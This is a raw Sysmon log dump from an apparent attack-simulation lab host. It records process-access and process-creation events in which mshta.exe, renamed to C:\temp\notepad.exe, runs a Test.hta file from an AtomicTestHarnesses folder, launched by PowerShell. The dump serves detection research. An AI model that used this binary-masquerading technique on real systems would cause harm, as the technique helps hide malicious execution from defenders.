16:10:34.534{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.534{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.534{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.534{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.534{7901BC46-55FA-6008-FD06-00000000A301}60886580C:\temp\notepad.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.532{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 0a1004e8-372c-4edb-af5e-773830c2fa81; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-55FA-6008-FD06-00000000A301}6088C:\Temp\notepad.exe"C:\temp\notepad.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" 10341000x800000000000000030988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.472{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.472{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.456{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.456{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.456{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.441{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.441{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.425{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.425{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.409{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.409{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.409{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.409{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.409{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.409{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.394{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000030972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.409{7901BC46-55FA-6008-FD06-00000000A301}6088C:\Temp\notepad.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\temp\notepad.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-55CB-6008-F006-00000000A301}1092C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000030971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.394{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.394{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.394{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.394{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.394{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet 